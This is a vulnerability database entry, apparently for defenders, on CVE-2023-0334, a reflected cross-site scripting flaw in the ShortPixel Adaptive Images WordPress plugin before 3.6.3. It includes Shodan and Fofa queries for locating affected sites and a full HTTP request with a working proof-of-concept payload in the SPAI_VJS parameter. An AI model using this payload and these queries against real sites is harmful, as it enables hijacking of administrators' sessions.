🔙 목록으로 돌아가기

CVE-2023-0334: ShortPixel Adaptive Images < 3.6.3 - Cross Site Scripting

TitleShortPixel Adaptive Images < 3.6.3 - Cross Site Scripting
Authorr3Y3r53
SeverityMedium
ImpactUnauthenticated attackers can inject malicious JavaScript to steal high-privilege user session cookies including administrator credentials.
RemediationFixed in version 3.6.3
CVSS Score6.1
EPSS Score0.22931
CVE IDCVE-2023-0334
CWE IDCWE-79
Shodan Queryhttp.html:/wp-content/plugins/shortpixel-adaptive-images/
Fofa Querybody=/wp-content/plugins/shortpixel-adaptive-images/
Tags cve2023 cve xss wpscan wordpress wp-plugin wp shortpixel-adaptive-images shortpixel vuln

🔍 Vulnerability Description

The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against any high privilege users such as admin

🌐 HTTP Request

GET /?SPAI_VJS=%3C/script%3E%3Cimg%20src%3D1%20onerror%3Dalert(document.domain)%3E HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2023/CVE-2023-0334.yaml

🦈 Packet Capture: ⬇️ Download cve-2023-0334.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A